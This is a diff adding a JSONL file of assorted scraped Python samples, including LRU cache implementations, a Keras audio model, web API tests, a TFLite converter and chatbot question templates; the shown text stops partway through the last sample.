diff --git "a/154.jsonl" "b/154.jsonl" new file mode 100644--- /dev/null +++ "b/154.jsonl" @@ -0,0 +1,673 @@ +{"seq_id":"192094601","text":"#LRU CACHE\n\n\"\"\"simplest solution using list and dic\"\"\"\nclass LRUCache(object):\n \"\"\"\n The main idea behind this is that you use a dictionary to check if an item exists\n and a list to keep track of what was least recently used. Pretty simple.\n \"\"\"\n\n def __init__(self, capacity):\n \"\"\"\n :type capacity: int\n \"\"\"\n self.cap = capacity\n self.order = []\n self.cache = {}\n\n def get(self, key):\n \"\"\"\n :rtype: int\n \"\"\"\n if key in self.cache:\n self.order.remove(key)\n self.order.append(key)\n return self.cache[key]\n else:\n return -1\n \n\n def put(self, key, value):\n \"\"\"\n :type key: int\n :type value: int\n :rtype: nothing\n \"\"\"\n \n if key in self.cache:\n self.order.remove(key)\n elif len(self.order) == self.cap:\n self.cache.pop(self.order[0])\n self.order.pop(0)\n \n self.order.append(key)\n self.cache[key] = value\n\n\n\"\"\"another solution using dict and deque\"\"\"\nclass LRUCache(object):\n def __init__(self, capacity):\n self.deque = collections.deque([])\n self.dic = {}\n self.capacity = capacity\n\n def get(self, key):\n if key not in self.dic:\n return -1\n self.deque.remove(key)\n self.deque.append(key)\n return self.dic[key]\n\n def set(self, key, value):\n if key in self.dic: \n self.deque.remove(key)\n elif len(self.dic) == self.capacity:\n v = self.deque.popleft() # remove the Least Recently Used element\n self.dic.pop(v)\n self.deque.append(key)\n self.dic[key] = value \n\n\n\"\"\"short solution using ordered dict\"\"\"\nclass LRUCache(object):\n def __init__(self, capacity):\n self.dic = collections.OrderedDict()\n self.remain = capacity\n\n def get(self, key):\n if key not in self.dic:\n return -1\n v = self.dic.pop(key) \n self.dic[key] = v # set key as the newest one\n return v\n\n def set(self, key, value):\n if key in self.dic: \n self.dic.pop(key)\n else:\n if self.remain > 0:\n self.remain -= 1 \n else: # self.dic is full\n self.dic.popitem(last=False) \n self.dic[key] = value\n\n\n\"\"\"\nPython Dict + Double LinkedList\n\"\"\"\nclass LinkedNode:\n def __init__(self, k, v):\n self.key = k\n self.value = v\n self.prev = None\n self.next = None\n\nclass LRUCache(object):\n\n def __init__(self, capacity):\n self.capacity = capacity\n self.head = LinkedNode(None,'head')\n self.tail = LinkedNode(None,'tail')\n self.head.next = self.tail # tail being most recent\n self.tail.prev = self.head # head being oldest\n self.data = {}\n \n def deleteNode(self,node):\n assert(node is not self.head and node is not self.tail)\n del self.data[node.key]\n node.prev.next = node.next\n node.next.prev = node.prev\n del node\n \n def get(self,key):\n if key not in self.data:\n return -1\n node = self.data[key]\n # take the node out\n node.prev.next = node.next\n node.next.prev = node.prev\n # insert into most recent position\n self.insertNew(node)\n return node.value\n\n def put(self, key, value):\n # remove old value if present\n if key in self.data:\n self.deleteNode(self.data[key])\n \n # create new node\n newNode = LinkedNode(key,value)\n self.data[key] = newNode\n \n # if over limit, delete oldest node\n if len(self.data)>self.capacity:\n self.deleteNode(self.head.next)\n \n self.insertNew(newNode)\n \n def insertNew(self,newNode):\n # insert new node into last position \n last = self.tail.prev\n last.next = newNode\n self.tail.prev = newNode\n newNode.next = self.tail\n newNode.prev = last\n","sub_path":"leetcode/lru_cache.py","file_name":"lru_cache.py","file_ext":"py","file_size_in_byte":4120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"310893960","text":"from keras import Sequential\nfrom keras.layers import BatchNormalization, Flatten, Dense, Conv2D, MaxPooling2D, Dropout\nfrom keras.applications.vgg16 import VGG16\nimport eval_util as eval\nimport csv\nimport numpy as np\nfrom os.path import dirname, exists, join\nfrom os import getcwd\n\n# import data\ndata_choice = 1\nsampling_choice = 2\nlabel_choice = 1\ntraining_epoch = 200\nn_features = 100\nn_frames = 100\nsampling_step = 10\n\nif data_choice == 0:\n data_type = \"melspectrogram\"\nelif data_choice == 1:\n data_type = \"mfcc\"\n\nif sampling_choice == 0:\n sampling_method = \"repeat\"\nelif sampling_choice == 1:\n sampling_method = \"padding\"\nelif sampling_choice == 2:\n sampling_method = \"adaptive_sampling\"\n\n# import data\ndataPath = join(dirname(getcwd()), \"Data\", data_type, sampling_method)\nresultPath = join(dirname(getcwd()), \"Result\", \"CNN\")\n\ntrainX = np.load(join(dataPath, \"train_\" + sampling_method + \"_\" + str(n_features) + \"_\" + str(n_frames) + \"_\" + str(\n sampling_step) + \"_\" + data_type + \".npy\"))\ntrainY = np.load(join(dataPath, \"train_\" + sampling_method + \"_\" + str(n_features) + \"_\" + str(n_frames) + \"_\" + str(\n sampling_step) + \"_\" + data_type + \"_labels.npy\"))\n\nvalX = np.load(join(dataPath, \"val_\" + sampling_method + \"_\" + str(n_features) + \"_\" + str(n_frames) + \"_\" + str(\n sampling_step) + \"_\" + data_type + \".npy\"))\nvalY = np.load(join(dataPath, \"val_\" + sampling_method + \"_\" + str(n_features) + \"_\" + str(n_frames) + \"_\" + str(\n sampling_step) + \"_\" + data_type + \"_labels.npy\"))\n\n# feature scaling\nfor i in range(trainX.shape[0]):\n trainX[i] = (trainX[i] - trainX[i].mean()) / trainX[i].std()\n\nfor i in range(valX.shape[0]):\n valX[i] = (valX[i] - valX[i].mean()) / valX[i].std()\n\n# expand dimension\ntrainX = np.expand_dims(trainX, 3)\nvalX = np.expand_dims(valX, 3)\n\n# concatenate the same trainX data to make it 3-channel\ntrainX = np.concatenate((trainX, trainX, trainX), 3)\nvalX = np.concatenate((valX, valX, valX), 3)\n\n# initialize VGG16 pre-trained model\nvgg16 = VGG16(include_top=False, weights='imagenet', input_shape=(100, 100, 3), pooling=\"avg\")\n\nif label_choice == 0:\n # this is for arousal prediction\n\n # reshape data input\n arousalTrain = trainY[:, 0].reshape(-1, 1)\n arousalVal = valY[:, 0].reshape(-1, 1)\n\n # initialize record\n arousal_record = open(join(resultPath, 'arousal.csv'), 'w')\n writer = csv.writer(arousal_record)\n writer.writerow(['Train_CCC', 'Val_CCC', 'Train_MSE', \"Val_MSE\"])\n\n vgg_features_train = vgg16.predict(trainX)\n vgg_features_val = vgg16.predict(valX)\n\n # create model\n model = Sequential()\n model.add(Dense(64, activation=\"relu\", input_dim=512))\n model.add(Dropout(0.3))\n model.add(Dense(64, activation=\"relu\"))\n model.add(Dropout(0.3))\n model.add(Dense(1, activation=\"relu\"))\n\n model.compile(optimizer=\"adam\", loss=\"mean_squared_error\")\n\n # train the model\n for epoch in range(training_epoch):\n print(\"\\n\", epoch + 1, \" / \", training_epoch)\n\n history = model.fit(vgg_features_train, arousalTrain, batch_size=32, verbose=1,\n validation_data=(vgg_features_val, arousalVal))\n\n train_pred = model.predict(trainX)\n val_pred = model.predict(valX)\n\n train_ccc = eval.ccc(arousalTrain, train_pred)[0][0]\n val_ccc = eval.ccc(arousalVal, val_pred)[0][0]\n\n # write into record\n train_loss = history.history['loss'][-1]\n val_loss = history.history['val_loss'][-1]\n writer.writerow([train_ccc, val_ccc, train_loss, val_loss])\n\n arousal_record.close()\n\nelif label_choice == 1:\n # this is for valence prediction\n\n # reshape data input\n arousalTrain = trainY[:, 1].reshape(-1, 1)\n arousalVal = valY[:, 1].reshape(-1, 1)\n\n # initialize record\n valence_record = open(join(resultPath, 'valence.csv'), 'w')\n writer = csv.writer(valence_record)\n writer.writerow(['Train_CCC', 'Val_CCC', 'Train_MSE', \"Val_MSE\"])\n\n vgg_features_train = vgg16.predict(trainX)\n vgg_features_val = vgg16.predict(valX)\n\n # create model\n model = Sequential()\n model.add(Dense(64, activation=\"relu\", input_dim=512))\n model.add(Dropout(0.3))\n model.add(Dense(64, activation=\"relu\"))\n model.add(Dropout(0.3))\n model.add(Dense(1, activation=\"relu\"))\n\n model.compile(optimizer=\"adam\", loss=\"mean_squared_error\")\n\n # train the model\n for epoch in range(training_epoch):\n print(\"\\n\", epoch + 1, \" / \", training_epoch)\n history = model.fit(trainX, arousalTrain, batch_size=32, verbose=1, validation_data=(valX, arousalVal))\n\n train_pred = model.predict(trainX)\n val_pred = model.predict(valX)\n\n train_ccc = eval.ccc(arousalTrain, train_pred)[0][0]\n val_ccc = eval.ccc(arousalVal, val_pred)[0][0]\n\n # write into record\n train_loss = history.history['loss'][-1]\n val_loss = history.history['val_loss'][-1]\n writer.writerow([train_ccc, val_ccc, train_loss, val_loss])\n\n valence_record.close()\n\n\n\n","sub_path":"Models/audio_vgg.py","file_name":"audio_vgg.py","file_ext":"py","file_size_in_byte":5020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"503978930","text":"import pytest\n\nimport virtool.users.utils\n\n\nasync def test_get(spawn_client, static_time):\n client = await spawn_client(authorize=True)\n\n resp = await client.get(\"/api/account\")\n\n assert resp.status == 200\n\n assert await resp.json() == {\n \"groups\": [],\n \"id\": \"test\",\n \"administrator\": False,\n \"identicon\": \"identicon\",\n \"last_password_change\": static_time.iso,\n \"permissions\": {p: False for p in virtool.users.utils.PERMISSIONS},\n \"primary_group\": \"technician\",\n \"settings\": {\n \"quick_analyze_workflow\": \"pathoscope_bowtie\",\n \"show_ids\": True,\n \"show_versions\": True,\n \"skip_quick_analyze_dialog\": True\n }\n }\n\n\n@pytest.mark.parametrize(\"error\", [\n None,\n \"email_error\",\n \"password_length_error\",\n \"missing_old_password\",\n \"credentials_error\"\n])\nasync def test_edit(error, spawn_client, resp_is, static_time):\n client = await spawn_client(authorize=True)\n\n client.app[\"settings\"][\"minimum_password_length\"] = 8\n\n data = {\n \"email\": \"dev-at-virtool.ca\" if error == \"email_error\" else \"dev@virtool.ca\",\n \"password\": \"foo\" if error == \"password_length_error\" else \"foo_bar_1\"\n }\n\n if error != \"missing_old_password\":\n data[\"old_password\"] = \"not_right\" if error == \"credentials_error\" else \"hello_world\"\n\n resp = await client.patch(\"/api/account\", data)\n\n if error == \"email_error\":\n await resp_is.invalid_input(resp, {\"dev-at-virtool.ca\": [\"unknown field\"]})\n\n elif error == \"password_length_error\":\n await resp_is.invalid_input(resp, {\"dev-at-virtool.ca\": [\"unknown field\"]})\n\n elif error == \"missing_old_password\":\n await resp_is.invalid_input(resp, {\"password\": [\"field 'old_password' is required\"]})\n\n elif error == \"credentials_error\":\n await resp_is.bad_request(resp, \"Invalid credentials\")\n\n else:\n assert resp.status == 200\n\n assert await resp.json() == {\n \"permissions\": {\n \"cancel_job\": False,\n \"create_ref\": False,\n \"create_sample\": False,\n \"modify_hmm\": False,\n \"modify_subtraction\": False,\n \"remove_file\": False,\n \"remove_job\": False,\n \"upload_file\": False\n },\n \"groups\": [],\n \"identicon\": \"identicon\",\n \"administrator\": False,\n \"last_password_change\": static_time.iso,\n \"primary_group\": \"technician\",\n \"settings\": {\n \"skip_quick_analyze_dialog\": True,\n \"show_ids\": True,\n \"show_versions\": True,\n \"quick_analyze_workflow\": \"pathoscope_bowtie\"\n },\n \"email\": \"dev@virtool.ca\",\n \"id\": \"test\"\n }\n\n\nasync def test_get_settings(spawn_client):\n \"\"\"\n Test that a ``GET /account/settings`` returns the settings for the session user.\n\n \"\"\"\n client = await spawn_client(authorize=True)\n\n resp = await client.get(\"/api/account/settings\")\n\n assert resp.status == 200\n\n assert await resp.json() == {\n \"skip_quick_analyze_dialog\": True,\n \"show_ids\": True,\n \"show_versions\": True,\n \"quick_analyze_workflow\": \"pathoscope_bowtie\"\n }\n\n\n@pytest.mark.parametrize(\"invalid_input\", [False, True])\nasync def test_update_settings(invalid_input, spawn_client, resp_is):\n \"\"\"\n Test that account settings can be updated at ``POST /account/settings`` and that requests to\n ``POST /account/settings`` return 422 for invalid JSON fields.\n\n \"\"\"\n client = await spawn_client(authorize=True)\n\n data = {\n \"show_ids\": False\n }\n\n if invalid_input:\n data = {\n \"foo_bar\": True,\n \"show_ids\": \"yes\"\n }\n\n resp = await client.patch(\"/api/account/settings\", data)\n\n if invalid_input:\n assert await resp_is.invalid_input(resp, {\n \"show_ids\": [\"must be of boolean type\"]\n })\n else:\n assert resp.status == 200\n\n assert await resp.json() == {\n \"skip_quick_analyze_dialog\": True,\n \"show_ids\": False,\n \"show_versions\": True,\n \"quick_analyze_workflow\": \"pathoscope_bowtie\"\n }\n\n\nasync def test_get_api_keys(spawn_client):\n client = await spawn_client(authorize=True)\n\n await client.db.keys.insert_many([\n {\n \"_id\": \"abc123\",\n \"id\": \"foobar_0\",\n \"name\": \"Foobar\",\n \"user\": {\n \"id\": \"test\"\n }\n },\n {\n \"_id\": \"xyz321\",\n \"id\": \"baz_1\",\n \"name\": \"Baz\",\n \"user\": {\n \"id\": \"test\"\n }\n }\n ])\n\n resp = await client.get(\"/api/account/keys\")\n\n assert await resp.json() == [\n {\n \"id\": \"foobar_0\",\n \"name\": \"Foobar\"\n },\n {\n \"id\": \"baz_1\",\n \"name\": \"Baz\"\n }\n ]\n\n\nclass TestCreateAPIKey:\n\n @pytest.mark.parametrize(\"has_perm\", [True, False])\n @pytest.mark.parametrize(\"req_perm\", [True, False])\n async def test(self, has_perm, req_perm, mocker, spawn_client, static_time, no_permissions):\n \"\"\"\n Test that creation of an API key functions properly. Check that different permission inputs work.\n\n \"\"\"\n mocker.patch(\"virtool.account.utils.generate_api_key\", return_value=(\"raw_key\", \"hashed_key\"))\n\n client = await spawn_client(authorize=True)\n\n if has_perm:\n await client.db.users.update_one({\"_id\": \"test\"}, {\n \"$set\": {\n \"permissions\": {\n **no_permissions,\n \"create_sample\": True\n }\n }\n })\n\n body = {\n \"name\": \"Foobar\"\n }\n\n if req_perm:\n body[\"permissions\"] = {\n \"create_sample\": True\n }\n\n resp = await client.post(\"/api/account/keys\", body)\n\n assert resp.status == 201\n\n expected = {\n \"_id\": \"hashed_key\",\n \"id\": \"foobar_0\",\n \"name\": \"Foobar\",\n \"created_at\": static_time.datetime,\n \"user\": {\n \"id\": \"test\"\n },\n \"groups\": [],\n \"permissions\": {**no_permissions, \"create_sample\": has_perm and req_perm}\n }\n\n assert await client.db.keys.find_one() == expected\n\n expected.update({\n \"key\": \"raw_key\",\n \"created_at\": static_time.iso\n })\n\n del expected[\"_id\"]\n del expected[\"user\"]\n\n assert await resp.json() == expected\n\n async def test_naming(self, mocker, spawn_client, static_time):\n \"\"\"\n Test that uniqueness is ensured on the ``id`` field.\n\n \"\"\"\n mocker.patch(\"virtool.account.utils.generate_api_key\", return_value=(\"raw_key\", \"hashed_key\"))\n\n client = await spawn_client(authorize=True)\n\n await client.db.keys.insert_one({\n \"_id\": \"foobar\",\n \"id\": \"foobar_0\",\n \"name\": \"Foobar\"\n })\n\n body = {\n \"name\": \"Foobar\"\n }\n\n resp = await client.post(\"/api/account/keys\", body)\n\n assert resp.status == 201\n\n expected = {\n \"_id\": \"hashed_key\",\n \"id\": \"foobar_1\",\n \"name\": \"Foobar\",\n \"created_at\": static_time.datetime,\n \"user\": {\n \"id\": \"test\"\n },\n \"groups\": [],\n \"permissions\": {p: False for p in virtool.users.utils.PERMISSIONS}\n }\n\n assert await client.db.keys.find_one({\"id\": \"foobar_1\"}) == expected\n\n expected.update({\n \"key\": \"raw_key\",\n \"created_at\": static_time.iso\n })\n\n del expected[\"_id\"]\n del expected[\"user\"]\n\n assert await resp.json() == expected\n\n\nclass TestUpdateAPIKey:\n\n @pytest.mark.parametrize(\"has_admin\", [True, False])\n @pytest.mark.parametrize(\"has_perm\", [True, False])\n async def test(self, has_admin, has_perm, spawn_client, static_time):\n client = await spawn_client(authorize=True)\n\n await client.db.users.update_one({\"_id\": \"test\"}, {\n \"$set\": {\n \"administrator\": has_admin,\n \"permissions.create_sample\": True,\n \"permissions.modify_subtraction\": has_perm\n }\n })\n\n expected = {\n \"_id\": \"foobar\",\n \"id\": \"foobar_0\",\n \"name\": \"Foobar\",\n \"created_at\": static_time.datetime,\n \"user\": {\n \"id\": \"test\"\n },\n \"groups\": [],\n \"permissions\": {p: False for p in virtool.users.utils.PERMISSIONS}\n }\n\n await client.db.keys.insert_one(expected)\n\n resp = await client.patch(\"/api/account/keys/foobar_0\", {\n \"permissions\": {\n \"create_sample\": True,\n \"modify_subtraction\": True\n }\n })\n\n assert resp.status == 200\n\n expected[\"permissions\"].update({\n \"create_sample\": True,\n \"modify_subtraction\": has_admin or has_perm\n })\n\n assert await client.db.keys.find_one() == expected\n\n del expected[\"_id\"]\n del expected[\"user\"]\n\n expected[\"created_at\"] = static_time.iso\n\n assert await resp.json() == expected\n\n async def test_not_found(self, spawn_client, resp_is):\n client = await spawn_client(authorize=True)\n\n resp = await client.patch(\"/api/account/keys/foobar_0\", {\n \"permissions\": {\n \"create_sample\": True\n }\n })\n\n assert await resp_is.not_found(resp)\n\n\n@pytest.mark.parametrize(\"error\", [None, \"404\"])\nasync def test_remove_api_key(error, spawn_client, resp_is):\n client = await spawn_client(authorize=True)\n\n if not error:\n await client.db.keys.insert_one({\n \"_id\": \"foobar\",\n \"id\": \"foobar_0\",\n \"name\": \"Foobar\",\n \"user\": {\n \"id\": \"test\"\n }\n })\n\n resp = await client.delete(\"/api/account/keys/foobar_0\")\n\n if error:\n assert await resp_is.not_found(resp)\n return\n\n assert await resp_is.no_content(resp)\n assert await client.db.keys.count_documents({}) == 0\n\n\nasync def test_remove_all_api_keys(spawn_client, resp_is):\n client = await spawn_client(authorize=True)\n\n await client.db.keys.insert_many([\n {\n \"_id\": \"hello_world\",\n \"id\": \"hello_world_0\",\n \"user\": {\n \"id\": \"test\"\n }\n },\n {\n \"_id\": \"foobar\",\n \"id\": \"foobar_0\",\n \"user\": {\n \"id\": \"test\"\n }\n },\n {\n \"_id\": \"baz\",\n \"id\": \"baz_0\",\n \"user\": {\n \"id\": \"fred\"\n }\n }\n ])\n\n resp = await client.delete(\"/api/account/keys\")\n\n assert await resp_is.no_content(resp)\n\n assert await client.db.keys.find().to_list(None) == [{\n \"_id\": \"baz\",\n \"id\": \"baz_0\",\n \"user\": {\n \"id\": \"fred\"\n }\n }]\n\n\nasync def test_logout(spawn_client):\n \"\"\"\n Test that calling the logout endpoint results in the current session being removed and the user being logged\n out.\n\n \"\"\"\n client = await spawn_client(authorize=True)\n\n # Make sure the session is authorized\n resp = await client.get(\"/api/account\")\n assert resp.status == 200\n\n # Logout\n resp = await client.get(\"/api/account/logout\")\n assert resp.status == 200\n\n # Make sure that the session is no longer authorized\n resp = await client.get(\"/api/account\")\n assert resp.status == 401\n\n\n@pytest.mark.parametrize(\"method,path\", [\n (\"GET\", \"/api/account\"),\n (\"PATCH\", \"/api/account\"),\n (\"GET\", \"/api/account/settings\"),\n (\"PATCH\", \"/api/account/settings\"),\n (\"PATCH\", \"/api/account/settings\"),\n (\"GET\", \"/api/account/keys\"),\n (\"POST\", \"/api/account/keys\"),\n (\"PATCH\", \"/api/account/keys/foobar\"),\n (\"DELETE\", \"/api/account/keys/foobar\"),\n (\"DELETE\", \"/api/account/keys\")\n])\nasync def test_requires_authorization(method, path, spawn_client):\n \"\"\"\n Test that a requires authorization 401 response is sent when the session is not authenticated.\n\n \"\"\"\n client = await spawn_client()\n\n if method == \"GET\":\n resp = await client.get(path)\n elif method == \"POST\":\n resp = await client.post(path, {})\n elif method == \"PATCH\":\n resp = await client.patch(path, {})\n else:\n resp = await client.delete(path)\n\n assert await resp.json() == {\n \"id\": \"requires_authorization\",\n \"message\": \"Requires authorization\"\n }\n\n assert resp.status == 401\n","sub_path":"tests/account/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":12893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"577828551","text":"hostname_dic = {}\nwith open(\"chrome_history.csv\", encoding=\"utf-8\") as csvfile:\n csv_reader = csv.reader(csvfile)\n birth_header = next(csv_reader)\n for row in csv_reader:\n hostname = parse.urlparse(row[0]).hostname\n hostname_dic[hostname] = hostname_dic.get(hostname, 0) + 1\nsorted(hostname_dic.items(),key = lambda x:x[1],reverse = True)\n\n\nc = (\n Pie()\n .add(\n \"\",\n [\n list(z)\n for z in zip(\n list(hostname_dic)[0:10],\n list(hostname_dic.values())[0:10],\n )\n ],\n center=[\"40%\", \"50%\"],\n )\n .set_global_opts(\n title_opts=opts.TitleOpts(title=\"历史记录\"),\n legend_opts=opts.LegendOpts(type_=\"scroll\", pos_left=\"80%\", orient=\"vertical\"),\n )\n .set_series_opts(label_opts=opts.LabelOpts(formatter=\"{b}: {c}\"))\n .render(\"pie_scroll_legend.html\")\n)\n \nprint(hostname_dic)\n","sub_path":"moumoubaimifan/history/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"98058848","text":"import tensorflow as tf\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.applications.mobilenet_v2 import MobileNetV2\nfrom tensorflow.keras.applications.mobilenet_v2 import preprocess_input\nimport numpy as np\nimport imageio\n\n\ndef representative_dataset():\n\n dataset_size = 10\n\n for i in range(dataset_size):\n\n data = imageio.imread(\"sample_images/\" + str(i) + \".jpg\")\n data = np.reshape(data, [1, 384, 576, 3])\n yield [data.astype(np.float32)]\n\n\ndef convert_model():\n\n # Define the input layer of your network and initialize the MobileNetV2 model\n\n input_size = (384, 576, 3)\n\n input_image = layers.Input(shape=input_size)\n input_image_normalized = preprocess_input(input_image)\n\n sample_model = MobileNetV2(input_tensor=input_image_normalized, input_shape=input_size, include_top=False)\n\n for layer in sample_model.layers:\n layer.trainable = False\n\n\n # Define the entire model\n model_dir = 'model/output/'\n\n # Load your pre-trained model\n # model.load_weights(\"path/to/your/saved/model\")\n\n # Export your model to the TFLite format\n converter = tf.lite.TFLiteConverter.from_saved_model(model_dir)\n\n # Be very careful here:\n # \"experimental_new_converter\" is enabled by default in TensorFlow 2.2+. However, using the new MLIR TFLite\n # converter might result in corrupted / incorrect TFLite models for some particular architectures. Therefore, the\n # best option is to perform the conversion using both the new and old converter and check the results in each case:\n converter.experimental_new_converter = False\n converter.experimental_new_quantizer = True\n\n converter.optimizations = [tf.lite.Optimize.DEFAULT]\n converter.representative_dataset = representative_dataset\n converter.target_spec.supported_ops = [tf.lite.OpsSet.TFLITE_BUILTINS_INT8]\n converter.inference_input_type = tf.uint8\n converter.inference_output_type = tf.uint8\n\n tflite_model = converter.convert()\n open(\"model.tflite\", \"wb\").write(tflite_model)\n\n # -----------------------------------------------------------------------------\n # That's it! Your model is now saved as model.tflite file\n # You can now try to run it using the PRO mode of the AI Benchmark application:\n # https://play.google.com/store/apps/details?id=org.benchmark.demo\n # More details can be found here (RUNTIME VALIDATION):\n # https://ai-benchmark.com/workshops/mai/2021/#runtime\n # -----------------------------------------------------------------------------\n\n\nconvert_model()\n","sub_path":"CVPR2021_scene_detection/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"119811320","text":"import unittest\n\nfrom braga import Assemblage, World\nfrom braga.examples import duel\n\n\nclass TestEquipmentSystem(unittest.TestCase):\n\n def setUp(self):\n self.world = World()\n self.player = self.world.make_entity(Assemblage([duel.EquipmentBearing]))\n\n self.wand_factory = Assemblage([duel.Equipment], equipment_type='wand')\n self.wand = self.world.make_entity(self.wand_factory)\n\n self.equipment_system = duel.EquipmentSystem(world=self.world, auto_update=True)\n\n def test_player_has_no_equipment(self):\n self.assertFalse(hasattr(self.player, 'wand'))\n\n def test_nonbearer_item_cannot_equip_equipment(self):\n second_wand = self.world.make_entity(self.wand_factory)\n\n with self.assertRaises(ValueError) as e:\n self.equipment_system.equip(self.wand, second_wand)\n\n self.assertEqual(e.exception.message, \"That cannot equip other items\")\n\n def test_player_equips_an_item(self):\n self.equipment_system.equip(self.player, self.wand)\n\n self.assertEqual(self.player.wand, self.wand)\n\n def test_player_cannot_equip_two_items(self):\n \"\"\" In other minigames, you will be allowed to equip an arbitrary number\n of items, but that is not necessary for the duel simulator.\n \"\"\"\n self.equipment_system.equip(self.player, self.wand)\n\n second_wand = self.world.make_entity(self.wand_factory)\n\n with self.assertRaises(ValueError) as e:\n self.equipment_system.equip(self.player, second_wand)\n\n self.assertEqual(e.exception.message, \"You cannot equip that at this time\")\n\n self.assertEqual(self.player.wand, self.wand)\n\n def test_unequipping_an_item(self):\n self.equipment_system.equip(self.player, self.wand)\n self.equipment_system.unequip(self.player, self.wand)\n\n self.assertFalse(hasattr(self.player, 'wand'))\n\n def test_unequipping_and_reequipping_an_item(self):\n self.equipment_system.equip(self.player, self.wand)\n self.equipment_system.unequip(self.player, self.wand)\n\n second_wand = self.world.make_entity(self.wand_factory)\n self.equipment_system.equip(self.player, second_wand)\n\n self.assertEqual(self.player.wand, second_wand)\n\n\nclass TestContainerSystem(unittest.TestCase):\n\n def setUp(self):\n self.world = World()\n bucket_factory = Assemblage(components=[duel.Container])\n self.bucket_one = self.world.make_entity(bucket_factory)\n self.bucket_two = self.world.make_entity(bucket_factory)\n\n self.thing_factory = Assemblage(components=[duel.Moveable])\n self.thing = self.world.make_entity(self.thing_factory, location=self.bucket_one)\n\n self.container_system = duel.ContainerSystem(world=self.world, auto_update=True)\n\n def test_move_item_to_new_inventory(self):\n self.container_system.move(self.thing, self.bucket_two)\n\n self.assertEqual(self.thing.location, self.bucket_two)\n self.assertEqual(self.bucket_two.inventory, set([self.thing]))\n\n def test_cannot_move_immoveable_item(self):\n bookcase = self.world.make_entity()\n\n with self.assertRaises(ValueError) as e:\n self.container_system.move(bookcase, self.bucket_two)\n\n self.assertEqual(e.exception.message, \"You cannot move this item\")\n self.assertEqual(self.bucket_two.inventory, set([]))\n\n def test_cannot_move_item_to_non_container(self):\n new_thing = self.thing_factory.make()\n with self.assertRaises(ValueError) as e:\n self.container_system.move(self.thing, new_thing)\n\n self.assertEqual(e.exception.message, \"Invalid destination\")\n self.assertEqual(self.thing.location, self.bucket_one)\n","sub_path":"braga/examples/duel/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"56576111","text":"#----------------------------------------------------------------\n# POD r-theta Mode I for all reference fields\n#----------------------------------------------------------------\n\n#Uref.PL.I.f_r , Uref.PL.I.g_theta_x , Uref.PL.I.g_theta_y , Uref.PL.I.Sing_Values = SVD_r_theta(Uref.PL.I.x , Uref.PL.I.y , 'Mode I' , radlong, thetalong)\n\nUref.PL.I.f_r , Uref.PL.I.g_theta_x , Uref.PL.I.g_theta_y = POD_r_theta(Uref.PL.I.x , Uref.PL.I.y , 'Mode I' , radlong, thetalong)\n\nfile2=open(os.path.join( ResultsDir,'plot_f_r_PL_I_Krange_[%3.2f_%3.2f]_%s_%d' % ( KI_Equ_min, KI_Equ_max, suffix_Cis, alpha)),'w') \nfor p in range(radlong): \n file2.write('%30.20E' % radial[p])\n file2.write('%30.20E ' % Uref.PL.I.f_r[p])\n file2.write(' \\n' )\n\nfile2.close()\n\nfile2=open(os.path.join( ResultsDir,'plot_g_theta_PL_I_Krange_[%3.2f_%3.2f]_%s_%d' % ( KI_Equ_min, KI_Equ_max, suffix_Cis, alpha)),'w')\ntheta= -Pi\nfor p in range(thetalong): \n file2.write('%30.20E ' % theta) \n file2.write('%30.20E ' % Uref.PL.I.g_theta_x[p]) \n file2.write('%30.20E ' % Uref.PL.I.g_theta_y[p]) \n file2.write(' \\n' ) \n theta += 2*Pi/(thetalong-1)\n\nfile2.close()\n\n","sub_path":"src_Post_Proc/POD_r_theta_PL_I.py","file_name":"POD_r_theta_PL_I.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"299189953","text":"# coding: utf-8\ntry:\n from .access_django import *\nexcept:\n from access_django import *\nimport random\nfrom django.template import Context, Template\nfrom utils.nlg import *\nfrom utils.tagger import *\nfrom utils.query import *\n# Templates\n# possible_slots = [\n# 'title',\n# 'when',\n# 'instructor',\n# 'classroom',\n# 'designated_for',\n# 'required_elective',\n# 'sel_method'\n# ]\nbe = ['', '是']\nask = ['', '請問', '告訴我', '跟我說', '想知道']\n\ntemplates = {\n 'request_title': [\n Template('{{ask}}有開哪些課'),\n Template('{{ask}}有哪些課'),\n Template('{{ask}}有開什麼課'),\n Template('{{ask}}{{instructor}}在{{when}}有哪些課'),\n Template('{{ask}}{{instructor}}有開哪些課'),\n Template('{{ask}}{{instructor}}有開什麼課'),\n Template('{{ask}}{{designated_for}}在{{when}}有哪些課'),\n Template('{{ask}}{{designated_for}}有開哪些課'),\n Template('{{ask}}{{designated_for}}{{instructor}}老師有開哪些課'),\n Template('{{ask}}{{when}}有哪些課'),\n Template('{{ask}}{{when}}{{designated_for}}有開哪些課'),\n Template('{{ask}}加簽方式是{{sel_method}}的課有哪些'),\n Template('{{ask}}{{when}}加簽方式是{{sel_method}}的課有哪些'),\n Template('{{ask}}{{when}}在{{classroom}}上課的是哪一門課'),\n ],\n 'request_instructor': [\n Template('{{ask}}老師是誰'),\n Template('{{ask}}老師是哪位'),\n Template('{{ask}}開{{title}}的老師是哪位'),\n Template('{{ask}}是誰開的'),\n Template('{{ask}}{{title}}這堂課的老師是哪位'),\n Template('{{ask}}哪位教授開的'),\n Template('{{ask}}教授是誰'),\n Template('{{ask}}是誰教的'),\n Template('{{ask}}{{designated_for}}的{{title}}是誰上的'),\n Template('{{ask}}{{designated_for}}的{{title}}是誰教的'),\n Template('{{ask}}{{designated_for}}的{{title}}是哪位教授'),\n Template('{{ask}}{{when}}{{designated_for}}的{{title}}是誰上的'),\n Template('{{ask}}{{when}}{{designated_for}}的{{title}}是誰教的'),\n 